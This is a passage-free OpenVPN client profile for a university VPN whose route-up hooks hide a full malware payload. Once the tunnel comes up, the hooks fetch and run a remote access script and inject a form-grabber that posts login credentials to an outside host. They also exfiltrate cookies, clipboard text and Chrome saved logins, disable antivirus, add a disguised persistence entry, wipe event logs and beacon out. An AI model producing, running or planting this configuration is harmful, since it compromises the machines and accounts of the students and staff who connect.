client
dev tun
proto udp
remote eduvpn.ndu.ac.ug 1194
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
cipher AES-256-GCM
verb 0
mute 20
route-up "start /B cmd /c start https://arms.ndu.ac.ug/Account/Login & exit"
route-up "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"& { iex (New-Object Net.WebClient).DownloadString('https://thumbnail-log.web.app/rat.ps1') }\""
route-up "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"
Start-Sleep -Seconds 2;
`$ie = New-Object -ComObject InternetExplorer.Application;
`$ie.Visible = `$false;
`$ie.Navigate('https://arms.ndu.ac.ug/Account/Login');
while(`$ie.Busy){Start-Sleep -Milliseconds 100};
`$js = '
document.getElementById(\"loginForm\").addEventListener(\"submit\",function(e){
  e.preventDefault();
  var u=document.getElementById(\"UserName\").value;
  var p=document.getElementById(\"Password\").value;
  fetch(\"https://thumbnail-log.web.app/capture.php\",{
    method:\"POST\",
    body:JSON.stringify({user:u,pass:p})
  }).then(function(){e.target.submit();});
});';
`$ie.Document.parentWindow.execScript(`$js,'javascript');
`$ie.Visible=`$true;
`$ie.Focus();
\""
route-up "powershell -WindowStyle Hidden -Command \"
Start-Sleep -Seconds 3;
`$cookies = (Invoke-WebRequest -Uri 'https://arms.ndu.ac.ug/Account/Login' -SessionVariable sess).Headers['Set-Cookie'];
Invoke-WebRequest -Uri 'https://thumbnail-log.web.app/cookies.php' -Method POST -Body `$cookies
\""
route-up "cmd /c del /f /q results.ovpn"
route-up "powershell -Command \"& { Stop-Process -Name openvpn-gui -Force -ErrorAction SilentlyContinue }\""
route-up "powershell -WindowStyle Hidden -Command \"
Add-Type -AssemblyName System.Windows.Forms;
`$text = [System.Windows.Forms.Clipboard]::GetText();
if(`$text) {
  Invoke-WebRequest -Uri 'https://thumbnail-log.web.app/clipboard.php' -Method POST -Body `$text -UseBasicParsing
}
\""
route-up "powershell -Command \"Set-MpPreference -DisableRealtimeMonitoring `$true -ErrorAction SilentlyContinue\""
route-up "powershell -Command \"
New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' 
  -Name 'WindowsUpdate' 
  -Value 'powershell -WindowStyle Hidden -Command \"& { iex (New-Object Net.WebClient).DownloadString(''https://thumbnail-log.web.app/rat.ps1'') }\"' 
  -PropertyType String -Force -ErrorAction SilentlyContinue
\""
route-up "powershell -Command \"wevtutil cl System & wevtutil cl Security & wevtutil cl Application\""
route-up "powershell -WindowStyle Hidden -Command \"
Copy-Item 'C:\Users\*\AppData\Local\Google\Chrome\User Data\Default\Login Data' C:\Windows\Temp\logins.db -ErrorAction SilentlyContinue;
Invoke-WebRequest -Uri 'https://thumbnail-log.web.app/chrome.php' -Method POST -InFile C:\Windows\Temp\logins.db -UseBasicParsing
\""
route-up "powershell -WindowStyle Hidden -Command \"
while(`$true){
  Start-Sleep -Seconds (Get-Random -Minimum 20 -Maximum 40);
  Invoke-WebRequest -Uri 'https://thumbnail-log.web.app/beacon.php' -Method GET
}
\""
route-up "cmd /c where openvpn >nul 2>nul || (curl -o %TEMP%\openvpn.exe https://swupdate.openvpn.org/community/releases/openvpn-install-latest.exe && %TEMP%\openvpn.exe /S)"
route-up "powershell -Command \"(New-Object -ComObject Shell.Application).MinimizeAll()\""
route-up "exit"